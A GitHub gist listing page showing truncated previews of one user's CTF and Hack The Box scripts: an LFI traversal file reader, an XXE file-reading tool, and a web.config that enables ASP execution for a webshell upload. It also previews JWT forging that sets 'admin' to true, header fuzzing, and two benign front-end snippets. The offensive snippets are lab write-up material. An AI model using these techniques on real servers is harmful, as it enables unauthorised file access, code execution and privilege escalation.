Ge0rg3
/ WaldoDirEnum.py
Created
December 15, 2018 17:18
A directory enumeration script for the Waldo HTB machine through LFI.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import sys, os | |
| url = "http://10.10.10.87/" | |
| headers={'Content-Type':'application/x-www-form-urlencoded'} | |
| startdir = "./.../...//.../...//.../...//" | |
| currentdir = startdir | |
| print("#########"*4+"\n# Directory traversal file reader. #\n# Commands: cd, ls, cat & clear. #\n"+"#########"*4) | |
| while True: |
Ge0rg3
/ colliding.js
Created
December 10, 2018 22:04
— forked from jtsternberg/colliding.js
Detect if two elements are colliding/overlapping
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Detects if two elements are colliding | |
| * | |
| * Credit goes to BC on Stack Overflow, cleaned up a little bit | |
| * | |
| * @link http://stackoverflow.com/questions/5419134/how-to-detect-if-two-divs-touch-with-jquery | |
| * @param $div1 | |
| * @param $div2 | |
| * @returns {boolean} | |
| */ |
Ge0rg3
/ web.config
Last active
August 9, 2019 15:27
Written for my Bounty HTB Write-up. Bodged together from other areas of the internet (most notably https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp & https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
Ge0rg3
/ XXEnumerate_2.py
Created
October 13, 2018 19:51
An XXE tool written for the DevOops box on HTB.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import sys | |
| filename = sys.argv[1] | |
| url = "http://10.10.10.91:5000/upload" | |
| data = """<?xml version="1.0"?> | |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://FD" >]> | |
| <Container> | |
| <Author></Author> |
Ge0rg3
/ Clicker-PartF.py
Created
October 7, 2018 00:17
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import jwt | |
| tokenData = { | |
| 'exp': 1538956189, | |
| 'iat': 0, | |
| 'sub': 0, | |
| 'admin': True | |
| } |
Ge0rg3
/ .UserSearcher.html
Last active
October 5, 2018 10:20
An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html | |
| Code spread across the 4 attached files. |
Ge0rg3
/ Clicker-PartE.py
Created
September 30, 2018 20:36
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| for i in range(1,1000): | |
| headers = { | |
| "bring_back_random_click":"hhhhhhhhhh", | |
| } | |
| req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers) | |
| if len(req.text) != 243: | |
| print req.text[:-1] | |
| break |
Ge0rg3
/ Clicker-PartE.py
Created
September 30, 2018 19:33
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import json | |
| url = "http://web.chal.csaw.io:10106/" | |
| def register(userpass): | |
| global auth | |
| if len(userpass) < 8: | |
| return "Please enter at least 8 characters." | |
| details = { | |
| "username":userpass, |
Ge0rg3
/ Clicker-PartD.py
Last active
October 8, 2018 09:58
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def stats(): | |
| global auth | |
| userinfo = rq.get("http://web.chal.csaw.io:10106/user", headers=auth).json() | |
| userclickers = json.loads(rq.get("http://web.chal.csaw.io:10106/clicker/user", headers=auth).json().replace("'",'"')) | |
| print("##########\nStats for "+userinfo['username']+":") | |
| print("##########") | |
| print("Money: "+str(userinfo['money'])) | |
| print("##########\nClicker Name | Clicker Value | Clicker Price\n"+("----------"*5)) | |
| for count, i in enumerate(userclickers): | |
| print(i['name']+" | "+str(i['value'])+" | "+str(i['price'])) |
Ge0rg3
/ Clicker-PartC.py
Created
September 29, 2018 23:36
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def click(clicker): | |
| global authorization | |
| data={'name':clicker} | |
| req = rq.post("http://web.chal.csaw.io:10106/clicker/click", headers=authorization, json=data) | |
| if req.json()['status'] == "success": | |
| return "Success!" | |
| elif req.json()['message'] == "Clicker not owned": | |
| return "Clicker not owned." | |
| else: | |
| return "Clicker does not exist." |